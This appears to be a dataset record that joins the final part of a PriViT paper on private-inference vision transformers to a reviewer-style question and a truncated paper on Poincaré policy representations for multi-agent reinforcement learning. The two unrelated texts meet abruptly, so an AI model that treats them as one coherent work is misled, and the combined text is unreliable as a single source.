**Fine-grained versus layer-wise Taylorization.** PriViT selectively Taylorizes individual softmax and GELU operations. To probe the effectiveness of this method, we contrast it with an alternative approach that Taylorizes a ViT model progressively, layer by layer. As illustrated in Table 8, our observations underscore the superiority of selective Taylorization.

**Visualization of non-linearity distribution.** To understand which nonlinearities are preserved, we investigate the distribution of PriViT models under different softmax and GELU budgets. From Figure 6, we conclude that GELUs in earlier encoder layers are preferred over those in later layers. From Figure 7, we observe a similar trend in softmax distributions. We find this interesting, since the trends reported in earlier work on convolutional networks are in the reverse direction: earlier layers tend to have a larger number of linearized units. Understanding this discrepancy is an interesting question for future work.

Figure 6: Comparison of GELU distribution between ViT-base (Base) and PriViT without softmax linearization. The x-axis represents the model's layer index, while the y-axis shows log-scaled GELU operations per layer.
With an input tensor size of $197 \times 3072$ for the GELU layer, each layer contains $197 \times 3072 = 605{,}184$ GELU operations. **Top:** 150K target GELUs. **Bottom:** 500K target GELUs.

Figure 7: Comparison of softmax distribution in the ViT-base model (Base) versus PriViT without GELU linearization. The x-axis denotes the layer index, while the y-axis shows the softmax operations per layer. With a $197 \times 197$ attention matrix across 12 heads, the ViT-base model totals 2,364 softmax operations per layer. Notably, PriViT tends to substitute earlier-layer softmaxes with linear operations. **Top:** 1K target softmaxes; **Bottom:** 10K target softmaxes.

## 5 Conclusion

We introduced PriViT, a new algorithm for designing MPC-friendly vision transformers, and showed its competitive performance on several image classification benchmarks. A natural direction for future work is to extend similar techniques to other families of transformer architectures, such as Swin Transformers and Data-Efficient Image Transformers (DeiT), as well as encoder-decoder transformer architectures. A key limitation of PriViT is its inability to Taylorize layernorms without introducing instability in training.

## References

Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E. Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016.

Minsu Cho, Zahra Ghodsi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Sphynx: ReLU-efficient network design for private inference. *arXiv preprint arXiv:2106.11755*, 2021.

Minsu Cho, Ameya Joshi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Selective network linearization for efficient private inference. In *International Conference on Machine Learning*, pp. 3947–3961. PMLR, 2022a.

Minsu Cho, Ameya Joshi, Brandon Reagen, Siddharth Garg, and Chinmay Hegde. Selective network linearization for efficient private inference. In *Proceedings of the 39th International Conference on Machine Learning*, volume 162 of *Proceedings of Machine Learning Research*, pp. 3947–3961. PMLR, 2022b. URL https://proceedings.mlr.press/v162/cho22a.html.

Ronald Cramer, Ivan Damgård, Daniel Escudero, Peter Scholl, and Chaoping Xing. SPDZ2k: Efficient MPC mod 2^k for dishonest majority. In *Annual International Cryptology Conference*, pp. 769–798. Springer, 2018.

Ekin D. Cubuk, Barret Zoph, Jonathon Shlens, and Quoc V. Le. RandAugment: Practical automated data augmentation with a reduced search space. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops*, pp. 702–703, 2020.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2020.

Craig Gentry and Shai Halevi. Implementing Gentry's fully-homomorphic encryption scheme. In *Annual International Conference on the Theory and Applications of Cryptographic Techniques*, pp. 129–148. Springer, 2011.

Zahra Ghodsi, Akshaj Kumar Veldanda, Brandon Reagen, and Siddharth Garg. CryptoNAS: Private inference on a ReLU budget. In *Adv. Neural Inf. Proc. Sys. (NeurIPS)*, 2020.

Zahra Ghodsi, Nandan Kumar Jha, Brandon Reagen, and Siddharth Garg. Circa: Stochastic ReLUs for private deep learning. In *Adv. Neural Inf. Proc. Sys. (NeurIPS)*, 2021.
Ali Hassani, Steven Walton, Nikhil Shah, Abulikemu Abuduweili, Jiachen Li, and Humphrey Shi. Escaping the big data paradigm with compact transformers. *arXiv preprint arXiv:2104.05704*, 2021.

Dan Hendrycks and Kevin Gimpel. Gaussian error linear units (GELUs). *arXiv preprint arXiv:1606.08415*, 2016.

Geoffrey Hinton, Oriol Vinyals, and Jeff Dean. Distilling the knowledge in a neural network. *arXiv preprint arXiv:1503.02531*, 2015.

Nandan Kumar Jha, Zahra Ghodsi, Siddharth Garg, and Brandon Reagen. DeepReDuce: ReLU reduction for fast private inference. In *Proc. Int. Conf. Machine Learning*, 2021.

Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014.

Vladimir Kolesnikov and Thomas Schneider. Improved garbled circuit: Free XOR gates and applications. In *Automata, Languages and Programming: 35th International Colloquium, ICALP 2008, Reykjavik, Iceland, July 7–11, 2008, Proceedings, Part II*, pp. 486–498. Springer, 2008.

Alex Krizhevsky, Geoffrey Hinton, et al. Learning multiple layers of features from tiny images. Technical report, University of Toronto, 2009.
Paper_ID: 2DJUXmHZ2O
Question: Does the tree architecture described for trajectories of MDPs extend in a straightforward way to multi-agent systems with different information structures? Is it assumed that each agent sees a different tree from its own perspective?
# Generalizing Poincaré Policy Representations in Multi-Agent Reinforcement Learning

Anonymous authors. Paper under double-blind review.

**Abstract.** Learning policy representations is essential for comprehending the intricacies of agent interactions and their decision-making processes. Recent studies have found that the evolution of any state under Markov decision processes (MDPs) can be divided into multiple hierarchies based on time sequences. This conceptualization resembles a tree-growing process, where the policy and environment dynamics determine the possible branches. In this paper, the growing trajectory paths of multiple agents are projected into a Poincaré ball, which requires the tree to grow from the origin toward the boundary of the ball; this motivates a new geometric idea of learning Poincaré Policy Representations (P2R) for MARL. Specifically, P2R captures policy representations in the Poincaré ball with a hyperbolic neural network and constructs a contrastive objective function that encourages embeddings of the same policy to move closer together while pushing embeddings of different policies apart, which enables embedding policies with low distortion. Experimental results provide empirical evidence for the effectiveness of the P2R framework in cooperative and competitive games, demonstrating the potential of Poincaré policy representations for optimizing policies in complex multi-agent environments.

## 1 Introduction

Multi-agent reinforcement learning (MARL) is widely used in a variety of applications, ranging from robotics (Kober et al., 2013) and autonomous vehicles (Shalev-Shwartz et al., 2016) to real-time strategy games (Vinyals et al., 2019), social networks (Chen et al., 2020b), and economic markets (Qiu et al., 2021). In MARL, agents interact with each other and their environment to learn effective policies. One of the key challenges in MARL is learning effective representations of the agents' policies, which need to capture the characteristics of the policies and the dynamics of the system that enable efficient decision-making. Furthermore, policy representations in MARL are crucial for realizing cooperation among agents, improving the performance and efficiency of the multi-agent system, and adapting to different tasks and environments.

Many recent works have been devoted to learning informative representations of agent policies using deep learning architectures for reinforcement learning (RL) (Albrecht & Stone, 2018; Papoudakis et al., 2021; Rabinowitz et al., 2018). He et al. (2016) introduced a method that focuses on learning a modeling network tasked with reconstructing the actions of a modeled agent based on its observations. Grover et al. (2018) put forward an approach that relies on imitation learning, training a mapping from observations to actions in a supervised manner to capture a point-based policy representation. Raileanu et al. (2018) developed an algorithm designed to infer an agent's intentions by leveraging the policy of the controlled agent. Tacchetti et al. (2018) introduced relational forward models that utilize graph neural networks for modeling agents. Zintgraf et al. (2021) employed a variational autoencoder (VAE) for agent modeling, particularly for fully-observable environments.
However, the aforementioned policy representation methods assume that the trajectory data structure has Euclidean properties under linear state transformations, whereas we notice that trajectory data has an implicit hierarchical property, which induces tree-like state evolution. We thus consider a different structure, and further find that the evolution of any state of a Markov decision process (MDP) (Puterman, 2014) can be divided into multiple hierarchies. This conceptualization resembles a tree-growing process, where the policy and environment dynamics determine the possible branches. These hierarchical evolution relationships are nonlinear due to the randomness of the environment dynamics and the policy, making hierarchy a natural basis for encoding information in MARL.

In this work, we assume the agent policies are black boxes; that is, we can only access them through interaction data with the environment, which we utilize to learn policy representations. Accordingly, learning effective policy representations should prioritize capturing precisely the hierarchically-structured features of the trajectories. Specifically, we take any state as the root of the tree structure and construct trees, as shown in Figure 1. The growth space and direction of the trees are determined by the action distribution of the policy and the environment randomness at each time step. The trees formed by the trajectories of different policies exhibit distinct characteristics, such as the width and depth of the left and right subtrees. Furthermore, the enclosing geometry of the Poincaré ball exhibits precisely exponential growth from the origin to the boundary, which enables embedding hierarchical tree-like trajectories with low distortion (Sarkar, 2011).

In this paper, we model the trajectories of multiple agents interacting with each other and their environment as the growth process of a tree, and describe the tree-like trajectory data in a Poincaré ball. We embed any state of a trajectory in the central region of the Poincaré ball, and as the agent interacts with the environment, the tree grows from the central region toward the edge of the ball. Specifically, we propose a novel framework (P2R) to learn policy representations in the Poincaré ball for multiple agents. P2R captures policy representations in the Poincaré ball with a hyperbolic neural network and constructs a contrastive objective function that encourages embeddings of the same policy to move closer together while pushing embeddings of different policies apart.

**Superiority of Poincaré policy representations.** The experimental results demonstrate the effectiveness of the P2R framework in both cooperative and competitive environments. These findings emphasize the potential of Poincaré policy representations and illuminate a path toward enhancing policy optimization in complex multi-agent environments.

## 2 Preliminaries

**Reinforcement learning.** The traditional formulation of the reinforcement learning (RL) problem revolves around the concept of a Markov decision process (MDP), defined by the tuple $M = (S, A, P, R, \gamma)$, where $S$ and $A$ stand for the state space and action space respectively, while $R(s, a)$ represents the reward function. The transition dynamics, denoted as $P(s'|s, a)$, dictate how the environment's state evolves, and the discount factor $\gamma \in [0, 1)$ quantifies the agent's preference for earlier rewards.
Within this framework, we introduce a stochastic policy $\pi_\theta$ that depends on a parameter vector $\theta$. The interaction between this policy and the environment produces a trajectory $\tau$, expressed as a sequence of state-action pairs $\tau = \{(s_t, a_t)\}_{t=1}^T$, with $T$ representing the maximum time step in an episode. The agent's goal is to learn a policy that maximizes its expected discounted cumulative reward over trajectories:
$$\arg\max_\theta \mathbb{E}_{\tau \sim \pi_\theta, P} \left[ \sum_{t=0}^\infty \gamma^t R(s_t, a_t) \right]. \tag{1}$$
This formulation extends seamlessly to multi-agent scenarios.

**Poincaré geometry.** A hyperbolic space $\mathbb{H}^n$ is an $n$-dimensional Riemannian manifold with constant negative sectional curvature $-c$. Beltrami (1868) established the equiconsistency of hyperbolic and Euclidean geometry, introducing the renowned Poincaré ball model named after its re-discoverer. The Poincaré ball $(\mathbb{B}^n, g^{\mathbb{B}})$ is defined by the manifold $\mathbb{B}^n = \{x \in \mathbb{R}^n \mid \|x\| < 1\}$ equipped with the Riemannian metric tensor $g^{\mathbb{B}}_x = \lambda_x^2 g^E$, where $\lambda_x := \frac{2}{1 - \|x\|^2}$ is the conformal factor and $g^E$ denotes the Euclidean metric tensor. The Poincaré ball model provides a geodesic distance for vectors $x, y \in \mathbb{B}^n$:
$$d_{\mathbb{B}}(x, y) = \cosh^{-1}\left(1 + 2\,\frac{\|x - y\|^2}{(1 - \|x\|^2)(1 - \|y\|^2)}\right). \tag{2}$$

Unlike a Euclidean vector space, hyperbolic space does not natively support affine vector operations such as summation and multiplication. To address this issue, we follow Ganea et al. (2018) and Shimizu et al. (2020), and utilize the framework of gyrovector spaces introduced by Ungar (2022) to extend common vector operations to hyperbolic space. The curvature of the Poincaré ball is controlled by $c$; the ball is then defined as $\mathbb{B}_c^n = \{x \in \mathbb{R}^n \mid c\|x\|^2 < 1, c \geq 0\}$, with the corresponding conformal factor $\lambda_x^c := \frac{2}{1 - c\|x\|^2}$.

**Möbius addition.** Given the curvature $-c$ of $\mathbb{B}_c^n$ and $x, y \in \mathbb{B}_c^n$, the Möbius addition is defined as:
$$x \oplus_c y = \frac{(1 + 2c\langle x, y \rangle + c\|y\|^2)x + (1 - c\|x\|^2)y}{1 + 2c\langle x, y \rangle + c^2\|x\|^2\|y\|^2}. \tag{3}$$

**Exponential and logarithmic maps.** The exponential map $\exp_x^c$ is a function from the tangent space $T_x\mathbb{B}_c^n \cong \mathbb{R}^n$ to $\mathbb{B}_c^n$, which provides a way of mapping vectors from Euclidean space to hyperbolic space. Given $x \in \mathbb{B}_c^n$ and $v \in T_x\mathbb{B}_c^n$, the exponential map is defined by:
$$\exp_x^c(v) := x \oplus_c \left( \tanh\!\left( \frac{\sqrt{c}\,\lambda_x^c\,\|v\|}{2} \right) \frac{v}{\sqrt{c}\,\|v\|} \right). \tag{4}$$
The reverse of the exponential map is the logarithmic map, defined as:
$$\log_x^c(y) := \frac{2}{\sqrt{c}\,\lambda_x^c}\, \text{arctanh}\!\left(\sqrt{c}\,\|{-x} \oplus_c y\|\right) \frac{-x \oplus_c y}{\|{-x} \oplus_c y\|}. \tag{5}$$
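These gyrovector operations translate directly into code. Below is a minimal PyTorch sketch of Möbius addition and the origin-centered exponential and logarithmic maps (Equations (3)-(5) with $x = 0$); the clamping constants are our numerical-stability assumptions:

```python
import torch

def mobius_add(x, y, c=1.0):
    """Mobius addition on the ball of curvature -c (Eq. 3)."""
    xy = (x * y).sum(-1, keepdim=True)
    x2 = (x * x).sum(-1, keepdim=True)
    y2 = (y * y).sum(-1, keepdim=True)
    num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y
    den = (1 + 2 * c * xy + c ** 2 * x2 * y2).clamp_min(1e-15)
    return num / den

def expmap0(v, c=1.0):
    """Exponential map at the origin: tangent vector -> point on the ball."""
    sc = c ** 0.5
    n = v.norm(dim=-1, keepdim=True).clamp_min(1e-15)
    return torch.tanh(sc * n) * v / (sc * n)

def logmap0(y, c=1.0):
    """Logarithmic map at the origin: point on the ball -> tangent vector."""
    sc = c ** 0.5
    n = y.norm(dim=-1, keepdim=True).clamp_min(1e-15)
    return torch.atanh((sc * n).clamp(max=1 - 1e-5)) * y / (sc * n)
```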
**Parallel transport.** Let $T_x\mathbb{B}_c^n$ be the tangent space at a vector $x \in \mathbb{B}_c^n$. Parallel transport establishes a linear isometric mapping between two tangent spaces; that is, it relocates a tangent vector $y \in T_0\mathbb{B}_c^n$ to $T_x\mathbb{B}_c^n$ via vector affine operations. This process consists of mapping $y$ into $\mathbb{B}_c^n$ through the exponential map, transitioning to the point $x$ using Möbius addition $\oplus_c$, and finally mapping into $T_x\mathbb{B}_c^n$ via the logarithmic map. The parallel transport is given by the following isometry:
$$P_{0 \rightarrow x}^c(y) = \log_x^c\!\left(x \oplus_c \exp_0^c(y)\right) = \frac{\lambda_0^c}{\lambda_x^c}\, y. \tag{6}$$
Through parallel transport, we can establish a connection between two distinct tangent spaces.

## 3 Poincaré Policy Embeddings

In this work, we assume that the agent policies are black boxes; our access to the policies is solely through interaction data with the environment. Drawing inspiration from prior research, specifically Grover et al. (2018) and Papoudakis et al. (2021), we recognize that trajectories, composed of state-action pairs, inherently convey a policy's characteristics; leveraging trajectories to acquire policy embeddings is therefore an effective strategy. To formalize this, our objective is to learn policy embeddings for each agent, denoted as $f_\Theta : E_\alpha \rightarrow \mathbb{B}^n$, where $E_\alpha$ represents the space of episode trajectories $\tau_\alpha$ associated with agent $\alpha$ during interactions with other agents and the environment, $n$ signifies the dimensionality of the embeddings, and $\Theta$ denotes the function's parameters. These trajectories consist exclusively of state-action pairs for agent $\alpha$. Specifically, $\Theta = \{\Theta_1, \ldots, \Theta_L\}$ refers to the parameters of the hyperbolic neural network, with each layer $\Theta_l$ comprising weight parameters $\Theta_l^W$ and bias parameters $\Theta_l^b$. Accordingly, for MARL, we introduce the following auxiliary tasks for learning an agent's policy representation:

1. **Policy representation.** The policy embeddings should possess the capability to capture hierarchical information. We project the trajectories into hyperbolic space and employ hyperbolic fully-connected (FC) neural networks for policy representation learning.

2. **Policy discrimination.** The obtained policy embeddings should be adept at distinguishing an agent's policy from those of other agents. To achieve policy discrimination, we leverage distance metrics within the Poincaré ball. Embeddings acquired from different trajectories but corresponding to the same policy should be proximate in the embedding space, while embeddings of distinct policies should exhibit greater separation.

### 3.1 Obtaining policy representations in the Poincaré ball

We propose a method for obtaining policy embeddings within the Poincaré ball. To ensure minimal distortion, we first project trajectories into the Poincaré ball, and subsequently use a hyperbolic neural network to learn policy representations from the projected trajectories. Suppose the episode trajectory space $E_\alpha = \{\tau_\alpha^k\}_{k=1}^K$ of agent $\alpha$ comprises $K$ trajectories. Trajectories are situated in Euclidean space, but we need to learn policy embeddings in hyperbolic space. To bridge the gap between Euclidean trajectories $\tau_\alpha^k$ of dimensionality $m$ and the hyperbolic space $\mathbb{H}^m$, we employ the exponential map at the origin of the Poincaré ball to project $\tau_\alpha^k$ into hyperbolic space.
We denote the result of mapping $\tau_\alpha^k$ into hyperbolic space as $\hat{\tau}_\alpha^k$; this procedure is formally defined as:
$$\hat{\tau}_\alpha^k = \exp_0^c(\tau_\alpha^k) = \tanh\left(\sqrt{c}\,\|\tau_\alpha^k\|\right) \frac{\tau_\alpha^k}{\sqrt{c}\,\|\tau_\alpha^k\|}. \tag{7}$$

Subsequently, we employ hyperbolic neural networks to extract hierarchical relationships and other essential features embedded within these trajectories. This ensures a high capacity to capture complex structures and extract tree-like properties within the hyperbolic space. Specifically, we leverage Möbius matrix-vector multiplication (Ganea et al., 2018) to define hyperbolic neural networks. Consider layer $l$, with weight parameters $\Theta_l^M \in M_{n,m}(\mathbb{R})$, a linear map $\mathbb{R}^m \to \mathbb{R}^n$ that we identify with its matrix representation. Then for all $\hat{\tau}_\alpha^k \in \mathbb{B}_c^n$ we have:
$$\Theta_l^M \otimes_c \hat{\tau}_\alpha^k = \frac{1}{\sqrt{c}} \tanh\left(\frac{\|\Theta_l^M \hat{\tau}_\alpha^k\|}{\|\hat{\tau}_\alpha^k\|} \tanh^{-1}\!\left(\sqrt{c}\,\|\hat{\tau}_\alpha^k\|\right)\right) \frac{\Theta_l^M \hat{\tau}_\alpha^k}{\|\Theta_l^M \hat{\tau}_\alpha^k\|}. \tag{8}$$

Biases are introduced into the hyperbolic neural networks, and these bias translations on the Poincaré ball are naturally achieved by moving along geodesics. We leverage parallel transport to define the Möbius translation of $\hat{\tau}_\alpha^k \in \mathbb{B}_c^n$ by the layer-$l$ bias parameters $\Theta_l^b \in \mathbb{B}_c^n$:
$$\hat{\tau}_\alpha^k \oplus_c \Theta_l^b = \exp_{\hat{\tau}_\alpha^k}^c\!\left(P_{0 \rightarrow \hat{\tau}_\alpha^k}^c\!\left(\log_0^c(\Theta_l^b)\right)\right) = \exp_{\hat{\tau}_\alpha^k}^c\!\left(\frac{\lambda_0^c}{\lambda_{\hat{\tau}_\alpha^k}^c} \log_0^c(\Theta_l^b)\right). \tag{9}$$

Finally, the unified form of the hyperbolic neural network encompasses multiple layers and integrates Equations (7), (8), and (9). Mathematically, it can be expressed as:
$$f_{\Theta_l}(\tau_\alpha^k) = \varphi_l\!\left(\Theta_l^M \otimes_c \left(\exp_0^c(\tau_\alpha^k)\right) \oplus_c \Theta_l^b\right), \tag{10}$$
where $\varphi_l$ represents the pointwise nonlinearity of the $l$-th layer. In Equation (10), the trajectory $\tau_\alpha^k$ undergoes a series of operations: it is first mapped into the Poincaré ball using the exponential map, then transformed by the weight parameters $\Theta_l^M$, then adjusted by the bias parameters $\Theta_l^b$, and finally passed through the nonlinear transformation $\varphi_l$. These steps are applied in each layer of the hyperbolic neural network, effectively enabling the network to capture hierarchical features of the trajectories.
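Putting Equations (7)-(10) together, a single hyperbolic feed-forward layer can be sketched as below. It reuses the `mobius_add`/`expmap0`/`logmap0` helpers from the earlier sketch; storing the bias in the tangent space and applying the pointwise nonlinearity via the tangent space are our design assumptions, not details fixed by the paper.

```python
import torch
import torch.nn as nn

class HypLinear(nn.Module):
    """One hyperbolic FC layer: Mobius matrix-vector product, Mobius bias
    translation, and a pointwise nonlinearity applied in the tangent space."""
    def __init__(self, in_dim, out_dim, c=1.0):
        super().__init__()
        self.weight = nn.Parameter(torch.empty(out_dim, in_dim))
        nn.init.xavier_uniform_(self.weight)
        # Bias stored in the tangent space at the origin (an assumption);
        # it is mapped onto the ball with expmap0 before the Mobius addition.
        self.bias = nn.Parameter(torch.zeros(out_dim))
        self.c = c

    def mobius_matvec(self, x):
        # Eq. (8): (1/sqrt(c)) * tanh(|Mx|/|x| * atanh(sqrt(c)|x|)) * Mx/|Mx|
        mx = x @ self.weight.t()
        x_n = x.norm(dim=-1, keepdim=True).clamp_min(1e-15)
        mx_n = mx.norm(dim=-1, keepdim=True).clamp_min(1e-15)
        sc = self.c ** 0.5
        r = torch.tanh(mx_n / x_n * torch.atanh((sc * x_n).clamp(max=1 - 1e-5)))
        return r * mx / (sc * mx_n)

    def forward(self, h):                  # h: points on the Poincare ball
        h = self.mobius_matvec(h)                                 # Eq. (8)
        h = mobius_add(h, expmap0(self.bias, self.c), self.c)     # Eq. (9)
        return expmap0(torch.relu(logmap0(h, self.c)), self.c)    # phi_l
```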
3.2 Consistent policy representations for each agent

Policy embeddings derived from distinct trajectories of the same policy must maintain consistency, reflecting adherence to common policy characteristics, and should exhibit proximity within the embedding space. To ensure consistency among policy embeddings obtained from different trajectories of the same policy, we compute the distance between policy embeddings using the distance equation within the Poincaré ball, as defined in Equation (2). Subsequently, we define a consistency objective function based on this distance measure:

\[ L_{\text{con}}(\Theta) = \frac{1}{A} \sum_{\alpha=1}^{A} \mathbb{E}_{k \neq k'} \left[ \log \left( 1 + \frac{d_B(f_\Theta(\tau^k_\alpha), f_\Theta(\tau^{k'}_\alpha))}{\epsilon} \right) + \mu \log \frac{1}{1 - \|f_\Theta(\tau^k_\alpha)\|} \right], \quad (11) \]

where \(1 \leq k, k' \leq K\), \(A\) denotes the number of agents, \(\epsilon\) serves as an adjustment parameter, and \(\mu\) is the regularization coefficient. Employing the logarithm effectively scales down the calculated distances and norms of the policy embeddings in the Poincaré ball, resulting in smoother values without altering the fundamental nature of the data or its relationships. The term on the left side of the plus sign is designed to minimize the Poincaré distance between sample points; its denominator includes the adjustment parameter \(\epsilon\), which amplifies the distance between two embeddings depending on the task data. The term on the right side of the plus sign regularizes the norm of each embedding, keeping it within the radius of the Poincaré ball; placing the norm in the denominator ensures that the argument of the logarithm remains positive. By minimizing the distance between embeddings obtained from different trajectories of the same policy, we obtain clusters of distinct embeddings of the same policy within the embedding space. This process accentuates the common characteristics of the policy.

3.3 Discriminative Representations Between Multiple Agents

Different policies inherently exhibit diverse action distributions given the same state, leading to distinctive characteristics in their respective trajectories during interactions with both the environment and other agents. Hence, it becomes imperative for policy embeddings to clearly portray these distinctions among different policies. These distinctions naturally surface in the embedding space, necessitating that embeddings of dissimilar policies possess well-defined boundaries. To fulfill this criterion, we ensure that embeddings of distinct policies are significantly separated within the Poincaré ball. Similarly, we employ the distance formula within the Poincaré ball, as defined in Equation (2), to quantify the dissimilarity between policy embeddings generated from trajectories of different agents. Based on this distance measure, we construct the discriminative objective function:

\[ L_{\text{dis}}(\Theta) = \frac{1}{A} \sum_{\alpha \neq \alpha'} \mathbb{E}_{k,k'} \left[ \log \left( 1 + \frac{d_B(f_\Theta(\tau^k_\alpha), f_\Theta(\tau^{k'}_{\alpha'}))}{\epsilon} \right) \right], \quad (12) \]

where \(A\) and \(\epsilon\) again denote the number of agents and an adjustment parameter, respectively. Within Equation (12), the application of the logarithm and the incorporation of \(\epsilon\) in the denominator follow the same rationale as in Equation (11). Therefore, by maximizing the distance between embeddings derived from distinct agents' trajectories, we establish clear boundaries among embeddings of different policies.
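As a companion sketch (again illustrative: the Equation (2) distance is re-implemented inline, and the values of `eps`, `mu`, and the curvature `c` are arbitrary placeholders), the two objectives can be written as follows, where `emb_same` holds embeddings of trajectories from one policy and `emb_a`/`emb_b` come from two different agents:

```python
import numpy as np

def mobius_add(x, y, c=1.0):
    xy, x2, y2 = np.dot(x, y), np.dot(x, x), np.dot(y, y)
    num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y
    return num / (1 + 2 * c * xy + c**2 * x2 * y2)

def poincare_dist(x, y, c=1.0):
    """Geodesic distance in the Poincare ball (the Equation (2) metric)."""
    arg = np.sqrt(c) * np.linalg.norm(mobius_add(-x, y, c))
    return (2 / np.sqrt(c)) * np.arctanh(min(arg, 1 - 1e-7))

def consistency_loss(emb_same, eps=0.1, mu=0.01, c=1.0):
    """Eq. (11): pull embeddings of one policy together, keep them off the boundary."""
    terms = []
    for i, ei in enumerate(emb_same):
        for j, ej in enumerate(emb_same):
            if i == j:
                continue
            d = poincare_dist(ei, ej, c)
            boundary_reg = np.log(1.0 / (1.0 - np.linalg.norm(ei)))
            terms.append(np.log(1.0 + d / eps) + mu * boundary_reg)
    return float(np.mean(terms))

def discriminative_loss(emb_a, emb_b, eps=0.1, c=1.0):
    """Eq. (12): separation between embeddings of two different agents' policies."""
    terms = [np.log(1.0 + poincare_dist(x, y, c) / eps) for x in emb_a for y in emb_b]
    return float(np.mean(terms))

# The two terms are combined with a trade-off weight beta in Section 3.4 below.
```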
3.4 Ensemble Consistent-Discriminative Representations

The consistency objective ensures that policy embeddings derived from different trajectories of the same agent exhibit clustering tendencies in the embedding space. Conversely, the discriminative objective aims to maximize the separation between policy embeddings of different agents within the embedding space. These two objectives complement each other, and we introduce an ensemble approach that integrates both of them. Specifically, to estimate the parameters \(\Theta\) of the policy representation function \(f_\Theta\), we solve the optimization problem given by the total objective function, which combines Equation (11) and Equation (12):

\[ L_{\text{ens}} = L_{\text{con}} + \beta L_{\text{dis}}, \quad (13) \]

where \(\beta\) is a trade-off hyperparameter that controls the relative weights of the consistency and discriminative terms. We train the policy representation function by optimizing Equation (13) via the stochastic Riemannian optimization method RSGD (Bonnabel, 2013). The algorithm for the proposed P2R method is presented in Appendix A.1.
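For reference, a minimal sketch of one RSGD step on the Poincaré ball, following Bonnabel (2013) and the operations defined above; the learning rate and the assumption that the Euclidean gradient `egrad` is supplied by automatic differentiation are ours:

```python
import numpy as np

def mobius_add(x, y, c=1.0):
    xy, x2, y2 = np.dot(x, y), np.dot(x, x), np.dot(y, y)
    num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y
    return num / (1 + 2 * c * xy + c**2 * x2 * y2)

def exp_map(x, v, c=1.0):
    """Exponential map at x on the Poincare ball."""
    lam = 2.0 / (1.0 - c * np.dot(x, x))  # conformal factor lambda_x^c
    vn = max(np.linalg.norm(v), 1e-7)
    return mobius_add(x, np.tanh(np.sqrt(c) * lam * vn / 2) * v / (np.sqrt(c) * vn), c)

def rsgd_step(theta, egrad, lr=1e-2, c=1.0):
    """One Riemannian SGD step: rescale the Euclidean gradient by the
    inverse metric, then move along the geodesic via the exponential map."""
    lam = 2.0 / (1.0 - c * np.dot(theta, theta))
    rgrad = egrad / lam**2  # Riemannian gradient on the ball
    return exp_map(theta, -lr * rgrad, c)
```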
4 EXPERIMENTS

4.1 MULTI-AGENT ENVIRONMENTS

We evaluate the performance of our method P2R in two multi-agent environments (one cooperative, one competitive): Overcooked (Carroll et al., 2019) and Pommerman (Resnick et al., 2018). These environments impose stringent demands on the sequencing of agent actions, exhibiting a pronounced hierarchical structure in the state evolution. More details about the experiments and additional experiments are presented in Appendix B.

**Cooperative** The Overcooked environment, as shown in Figure 2, is a simplified version of the popular video game Overcooked (Ghost Town Games, 2016). Within this environment, two agents assume the roles of chefs in a kitchen tasked with cooking and serving dishes. The kitchen contains only three types of objects: onions (yellow), dishes (white), and a cooking pot (dark grey). The task involves agents placing three onions in the pot, allowing them to cook for a duration of 20 timesteps, transferring the resulting soup into a dish (white), and subsequently serving it (light grey), giving all players a reward of 20. The primary objective is to deliver the soup as many times as possible within the time limit. The agents are equipped with six distinct actions: moving up, moving down, moving left, moving right, taking no action (noop), and "interact", which triggers specific actions based on the tile the player is facing, e.g., placing an onion on a counter. A pivotal aspect of the challenges presented in the Overcooked environments is the necessity for agents to possess a keen understanding of their partner's policy characteristics and to coordinate effectively accordingly.

Figure 2: Overcooked environment layouts. From left to right: Cramped Room confines the agents to a tight space, increasing the likelihood of agent collisions. Asymmetric Advantages tests whether agents can devise high-level strategies that capitalize on their individual strengths. In Coordination Ring, agents must effectively coordinate their movements to traverse between the bottom left and top right corners of the kitchen. Forced Coordination compels agents to formulate a comprehensive joint strategy, since neither player can independently serve a dish. Counter Circuit involves a non-obvious coordination strategy, where onions are passed over the counter to the pot rather than being carried around. Each layout is equipped with one or more onion dispensers and dish dispensers, providing an unlimited supply of onions and dishes, respectively.

**Pommerman** The Pommerman environment draws its inspiration from the classic console game Bomberman (W, 1983). In our experiments, we utilize the simulator configured for two agents whose initial positions are randomized close to any of the four corners of the board, as depicted in Figure 3. At each time step, each agent can choose from six possible actions: movement in any of the four directions, staying in place, or placing a bomb. The environment consists of cells that can be passages, rigid walls (dark brown cells), or wood (light brown cells), with maps being randomly generated. Importantly, there is always a guaranteed path between any two agents on the map. The objective of the task is to be the last agent standing, earning a reward of 1 for victory, while tie games result in an episodic reward of -1. When an agent places a bomb, it explodes after 10 time steps, producing flames that last for 2 time steps. These flames can destroy wood and kill agents within their blast radius. The destruction of wood can reveal either a passage or a power-up (yellow circles). Power-ups fall into three categories: those that increase the blast radius of bombs, those that increase the number of bombs an agent can place, and those that grant the ability to kick bombs. An episode of two-player Pommerman finishes when an agent dies or when 800 timesteps are reached.

4.2 Baselines

**Local Information Agent Modelling (LIAM)** (Papoudakis et al., 2021): This baseline presents an encoder-decoder agent modeling method capable of extracting concise yet informative representations of modeled agents, relying solely on the local information available to the controlled agent (including its local state observations and past actions). We include LIAM for two reasons: it employs a recurrent encoder for policy representation learning, and it leverages local state observations in a manner akin to P2R. Through the results, we can compare the performance of memory modeling based on recurrent encoders with tree-like hierarchical modeling in the Poincaré ball.

**Agent Policy Representation Framework (AMF)** (Grover et al., 2018): This baseline introduced an approach centered on imitation learning, where a supervised training scheme is employed to map observations to actions, thereby capturing a point-based policy representation. In contrast to P2R, which learns policy representations in the Poincaré ball, AMF operates in Euclidean space. We can thus observe whether the policy embeddings within the Poincaré ball, as obtained by P2R, result in better performance. All baselines are trained with the PPO algorithm (Schulman et al., 2017).

